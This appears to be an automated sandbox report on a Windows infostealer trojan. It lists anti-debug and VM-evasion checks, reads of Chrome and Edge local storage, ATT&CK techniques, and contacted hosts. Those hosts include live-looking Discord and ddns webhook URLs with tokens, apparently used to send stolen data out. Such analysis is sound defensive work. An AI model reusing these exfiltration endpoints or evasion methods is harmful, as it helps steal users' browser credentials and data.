      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2455Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 958Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5568Thread sleep count: 2455 > 30Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5568Thread sleep count: 958 > 30Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6108Thread sleep time: -922337203685477s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\CFuejz2dRu.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM Win32_Processor
      Source: C:\Users\user\Desktop\CFuejz2dRu.exeFile Volume queried: C:\Users\user\Desktop FullSizeInformationJump to behavior
      Source: C:\Users\user\Desktop\CFuejz2dRu.exeFile Volume queried: \Device\CdRom0\ FullSizeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: CFuejz2dRu.exe, 00000000.00000002.1594712906.000001C0D5E1C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
      Source: C:\Users\user\Desktop\CFuejz2dRu.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Users\user\Desktop\CFuejz2dRu.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [Diagnostics.Debugger]::IsAttachedJump to behavior
      Source: C:\Users\user\Desktop\CFuejz2dRu.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\CFuejz2dRu.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\CFuejz2dRu.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\CFuejz2dRu.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\CFuejz2dRu.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\CFuejz2dRu.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\CFuejz2dRu.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

      Stealing of Sensitive Information

      barindex
      Source: Yara matchFile source: 00000000.00000002.1591335139.000000C000016000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: CFuejz2dRu.exe PID: 5460, type: MEMORYSTR
      Source: C:\Users\user\Desktop\CFuejz2dRu.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldbJump to behavior
      Source: C:\Users\user\Desktop\CFuejz2dRu.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.logJump to behavior

      Remote Access Functionality

      barindex
      Source: Yara matchFile source: 00000000.00000002.1591335139.000000C000016000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: CFuejz2dRu.exe PID: 5460, type: MEMORYSTR
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
      Windows Management Instrumentation
      1
      DLL Side-Loading
      11
      Process Injection
      1
      Modify Registry
      1
      OS Credential Dumping
      1
      Query Registry
      Remote Services1
      Data from Local System
      1
      Encrypted Channel
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault Accounts2
      Command and Scripting Interpreter
      Boot or Logon Initialization Scripts1
      DLL Side-Loading
      31
      Virtualization/Sandbox Evasion
      LSASS Memory11
      Security Software Discovery
      Remote Desktop ProtocolData from Removable Media3
      Ingress Tool Transfer
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
      Process Injection
      Security Account Manager1
      Process Discovery
      SMB/Windows Admin SharesData from Network Shared Drive4
      Non-Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      Install Root Certificate
      NTDS31
      Virtualization/Sandbox Evasion
      Distributed Component Object ModelInput Capture15
      Application Layer Protocol
      Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      DLL Side-Loading
      LSA Secrets1
      Application Window Discovery
      SSHKeylogging1
      Proxy
      Scheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials1
      System Network Configuration Discovery
      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync14
      System Information Discovery
      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      CFuejz2dRu.exe37%ReversingLabsWin64.Trojan.GenSteal
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/pc_name_list.txt0%Avira URL Cloudsafe
      https://discord.com/api/webhooks/1300019313184608266/FeQlgT1nouUBj-HNeYycjpr9Nw2LI_OPHxx-u8ZXx5mMbMn1xnI5pbwKHfVTgTRkzJCv0%Avira URL Cloudsafe
      http://o.pki.goog/s/we1/Rk8http://i.pki.goog/we1.crt0%Avira URL Cloudsafe
      http://c.pki.goog/r/gsr1.crl0%Avira URL Cloudsafe
      https://jsonblob.com/0%Avira URL Cloudsafe
      http://i.pki.goog/r4.crtGlobalSign0%Avira URL Cloudsafe
      http://c.pki.goog/we1/fJedmL2peto.crl0%Avira URL Cloudsafe
      http://c.pki.goog/we1/fJedmL2peto.crl00%Avira URL Cloudsafe
      https://jsonblob.com/api/jsonBlob0%Avira URL Cloudsafe
      http://c.pki.goog/r/r4.crl0%Avira URL Cloudsafe
      http://i.pki.goog/gsr1.crthttp://c.pki.goog/r/gsr1.crl0%Avira URL Cloudsafe
      https://goatherd.ddns.net/webhook/1218887559619412029/Eva2oRkKwFen8y0e2duZ2zkjwo66NO-HdAdY99U_FseLCs0vvbTTUpzvmBAHiUakxGb30%Avira URL Cloudsafe
      http://o.pki.goog/s/we1/Rk80%0%Avira URL Cloudsafe
      https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/ip_list.txt0%Avira URL Cloudsafe
      http://o.pki.goog/s/we1/Rk80%Avira URL Cloudsafe
      http://i.pki.goog/gsr1.crt0%Avira URL Cloudsafe
      https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/mac_list.txt0%Avira URL Cloudsafe
      http://i.pki.goog/we1.crt0%Avira URL Cloudsafe
      http://i.pki.goog/gsr1.crthttp://c.pki.goog/r/gsr1.crlCertCreateCertificateContextCertFreeCertificat0%Avira URL Cloudsafe
      NameIPActiveMaliciousAntivirus DetectionReputation
      discord.com
      162.159.137.232
      truefalse
        unknown
        raw.githubusercontent.com
        185.199.108.133
        truefalse
          unknown
          api.ipify.org
          104.26.13.205
          truefalse
            high
            jsonblob.com
            188.114.97.3
            truefalse
              unknown
              goatherd.ddns.net
              unknown
              unknowntrue
                unknown
                NameMaliciousAntivirus DetectionReputation
                https://discord.com/api/webhooks/1300019313184608266/FeQlgT1nouUBj-HNeYycjpr9Nw2LI_OPHxx-u8ZXx5mMbMn1xnI5pbwKHfVTgTRkzJCvfalse
                • Avira URL Cloud: safe
                unknown
                https://jsonblob.com/api/jsonBlobfalse
                • Avira URL Cloud: safe
                unknown
                https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/pc_name_list.txtfalse
                • Avira URL Cloud: safe
                unknown
                https://goatherd.ddns.net/webhook/1218887559619412029/Eva2oRkKwFen8y0e2duZ2zkjwo66NO-HdAdY99U_FseLCs0vvbTTUpzvmBAHiUakxGb3false
                • Avira URL Cloud: safe
                unknown
                https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/ip_list.txtfalse
                • Avira URL Cloud: safe
                unknown
                https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/mac_list.txtfalse
                • Avira URL Cloud: safe
                unknown
                NameSourceMaliciousAntivirus DetectionReputation
                http://i.pki.goog/gsr1.crt0-CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C00025C000.00000004.00001000.00020000.00000000.sdmp, CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C00026C000.00000004.00001000.00020000.00000000.sdmp, CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C00024E000.00000004.00001000.00020000.00000000.sdmpfalse
                  high
                  http://o.pki.goog/s/we1/Rk8http://i.pki.goog/we1.crtCFuejz2dRu.exe, 00000000.00000002.1591335139.000000C00000E000.00000004.00001000.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://c.pki.goog/r/r4.crl0CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C00026A000.00000004.00001000.00020000.00000000.sdmp, CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C00025C000.00000004.00001000.00020000.00000000.sdmp, CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C00024E000.00000004.00001000.00020000.00000000.sdmpfalse
                    high
                    http://i.pki.goog/r4.crtGlobalSignCFuejz2dRu.exe, 00000000.00000002.1591335139.000000C00000E000.00000004.00001000.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://i.pki.goog/we1.crt0CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C00025C000.00000004.00001000.00020000.00000000.sdmp, CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C00024E000.00000004.00001000.00020000.00000000.sdmp, CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C000262000.00000004.00001000.00020000.00000000.sdmpfalse
                      high
                      http://c.pki.goog/we1/fJedmL2peto.crl0CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C00025C000.00000004.00001000.00020000.00000000.sdmp, CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C00024E000.00000004.00001000.00020000.00000000.sdmp, CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C000262000.00000004.00001000.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://jsonblob.com/CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C0000E8000.00000004.00001000.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://c.pki.goog/r/gsr1.crl0CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C00025C000.00000004.00001000.00020000.00000000.sdmp, CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C00026C000.00000004.00001000.00020000.00000000.sdmp, CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C00024E000.00000004.00001000.00020000.00000000.sdmpfalse
                        high
                        http://i.pki.goog/r4.crt0CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C00026A000.00000004.00001000.00020000.00000000.sdmp, CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C00025C000.00000004.00001000.00020000.00000000.sdmp, CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C00024E000.00000004.00001000.00020000.00000000.sdmpfalse
                          high
                          http://c.pki.goog/r/gsr1.crlCFuejz2dRu.exe, 00000000.00000002.1591335139.000000C00000E000.00000004.00001000.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://c.pki.goog/r/r4.crlCFuejz2dRu.exe, 00000000.00000002.1591335139.000000C00000E000.00000004.00001000.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://c.pki.goog/we1/fJedmL2peto.crlCFuejz2dRu.exe, 00000000.00000002.1591335139.000000C00000E000.00000004.00001000.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://i.pki.goog/gsr1.crthttp://c.pki.goog/r/gsr1.crlCFuejz2dRu.exe, 00000000.00000002.1591335139.000000C00000E000.00000004.00001000.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://i.pki.goog/gsr1.crtCFuejz2dRu.exe, 00000000.00000002.1591335139.000000C00000E000.00000004.00001000.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://i.pki.goog/gsr1.crthttp://c.pki.goog/r/gsr1.crlCertCreateCertificateContextCertFreeCertificatCFuejz2dRu.exe, 00000000.00000002.1591335139.000000C00000E000.00000004.00001000.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://o.pki.goog/s/we1/Rk80%CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C00025C000.00000004.00001000.00020000.00000000.sdmp, CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C00024E000.00000004.00001000.00020000.00000000.sdmp, CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C000262000.00000004.00001000.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://o.pki.goog/s/we1/Rk8CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C00000E000.00000004.00001000.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://i.pki.goog/we1.crtCFuejz2dRu.exe, 00000000.00000002.1591335139.000000C00000E000.00000004.00001000.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs
                          IPDomainCountryFlagASNASN NameMalicious
                          162.159.137.232
                          discord.comUnited States
                          13335CLOUDFLARENETUSfalse
                          188.114.97.3
                          jsonblob.comEuropean Union
                          13335CLOUDFLARENETUSfalse
                          185.199.108.133
                          raw.githubusercontent.comNetherlands
                          54113FASTLYUSfalse
                          86.237.153.121
                          unknownFrance
                          3215FranceTelecom-OrangeFRfalse
                          104.26.13.205
                          api.ipify.orgUnited States
                          13335CLOUDFLARENETUSfalse
                          Joe Sandbox version:41.0.0 Charoite
                          Analysis ID:1548554
                          Start date and time:2024-11-04 16:23:34 +01:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 3m 54s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:7
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:CFuejz2dRu.exe
                          renamed because original name is a hash value
                          Original Sample Name:5f343fef68caa4a9bfd673cd071b7f6dbac55995433735e35af63e018cabae3f.exe
                          Detection:MAL
                          Classification:mal76.troj.spyw.evad.winEXE@4/3@5/5
                          EGA Information:Failed
                          HCA Information:Failed
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Stop behavior analysis, all processes terminated
                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                          • Execution Graph export aborted for target CFuejz2dRu.exe, PID 5460 because it is empty
                          • Not all processes where analyzed, report is missing behavior information
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • VT rate limit hit for: CFuejz2dRu.exe
                          TimeTypeDescription
                          10:24:40API Interceptor1x Sleep call for process: CFuejz2dRu.exe modified
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          162.159.137.232file.exeGet hashmaliciousUnknownBrowse
                            SecuriteInfo.com.FileRepMalware.22561.28030.exeGet hashmaliciousPython Stealer, Exela StealerBrowse
                              570ZenR882.exeGet hashmaliciousUnknownBrowse
                                Ff0ZjqSI9Y.exeGet hashmaliciousUnknownBrowse
                                  SecuriteInfo.com.Win32.MalwareX-gen.3620.22364.exeGet hashmaliciousUnknownBrowse
                                    EUOgPjsBTC.exeGet hashmaliciousUnknownBrowse
                                      webhook.ps1Get hashmaliciousUnknownBrowse
                                        sys_upd.ps1Get hashmaliciousUnknownBrowse
                                          cr_asm_menu..ps1Get hashmaliciousUnknownBrowse
                                            cr_asm2.ps1Get hashmaliciousUnknownBrowse
                                              188.114.97.3QUOTATION_NOVQTRA071244.PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • filetransfer.io/data-package/16zkKlMo/download
                                              SecuriteInfo.com.Trojan.DownLoader47.46584.19040.8588.exeGet hashmaliciousUnknownBrowse
                                              • servicetelemetryserver.shop/api/index.php
                                              SecuriteInfo.com.Trojan.DownLoader47.46584.19040.8588.exeGet hashmaliciousUnknownBrowse
                                              • servicetelemetryserver.shop/api/index.php
                                              Ponta Saheb. PO 4400049817.exeGet hashmaliciousFormBookBrowse
                                              • www.1450thedove.com/z3su/
                                              URGENT REQUEST FOR QUOTATION.exeGet hashmaliciousFormBookBrowse
                                              • www.bayarcepat19.click/5hcm/
                                              A4mmSHCUi2.exeGet hashmaliciousFormBookBrowse
                                              • www.awarnkishesomber.space/rmi6/
                                              18in SPA-198-2024.exeGet hashmaliciousFormBookBrowse
                                              • www.timizoasisey.shop/3p0l/
                                              lf1SPbZI3V.exeGet hashmaliciousLokibotBrowse
                                              • touxzw.ir/alpha2/five/fre.php
                                              Comprobante de pago.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                              • paste.ee/d/vdlzo
                                              Purchase_Order_pdf.exeGet hashmaliciousFormBookBrowse
                                              • www.bayarcepat19.click/g48c/
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              discord.comfile.exeGet hashmaliciousGrowtopiaBrowse
                                              • 162.159.138.232
                                              file.exeGet hashmaliciousUnknownBrowse
                                              • 162.159.137.232
                                              gMd6of50Do.exeGet hashmaliciousBlank GrabberBrowse
                                              • 162.159.136.232
                                              El9HaBFrFM.exeGet hashmaliciousBlank GrabberBrowse
                                              • 162.159.128.233
                                              aLRjksjY78.exeGet hashmaliciousHackBrowserBrowse
                                              • 162.159.136.232
                                              jF5cZUXeQm.exeGet hashmaliciousBlank GrabberBrowse
                                              • 162.159.135.232
                                              SecuriteInfo.com.FileRepMalware.22561.28030.exeGet hashmaliciousPython Stealer, Exela StealerBrowse
                                              • 162.159.136.232
                                              SecuriteInfo.com.Win64.Malware-gen.13500.20938.exeGet hashmaliciousPython Stealer, Exela StealerBrowse
                                              • 162.159.138.232
                                              runtime.exeGet hashmaliciousUnknownBrowse
                                              • 162.159.138.232
                                              runtime.exeGet hashmaliciousUnknownBrowse
                                              • 162.159.128.233
                                              raw.githubusercontent.comPurchase order.vbsGet hashmaliciousUnknownBrowse
                                              • 185.199.109.133
                                              SecuriteInfo.com.Win64.Malware-gen.19901.26035.exeGet hashmaliciousPython Stealer, Monster StealerBrowse
                                              • 185.199.109.133
                                              bcb.vbsGet hashmaliciousUnknownBrowse
                                              • 185.199.111.133
                                              cac.jsGet hashmaliciousUnknownBrowse
                                              • 185.199.109.133
